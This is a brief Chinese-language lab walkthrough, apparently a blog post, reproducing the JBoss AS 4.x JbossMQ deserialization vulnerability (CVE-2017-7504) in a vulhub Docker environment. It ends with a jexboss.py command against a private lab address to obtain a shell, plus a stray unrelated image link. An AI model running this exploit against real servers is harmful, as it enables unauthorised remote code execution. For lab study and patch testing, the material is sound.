漏洞介绍
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的
HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏ 任意代码执⾏
影响范围
JBoss 4.x 以及之前的所有版本
环境搭建
cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
漏洞复现
1.访问漏洞地址
172.16.1.81:8080/jbossmq-httpil/HTTPServerILServlet
2.获取shell
python3 jexboss.py -u http://172.16.1.81:8080/
![Hive企业级调优[3]—— Explain 查看执行计划](https://i-blog.csdnimg.cn/direct/70b4f4437da04c189f4758a8c9912807.png)
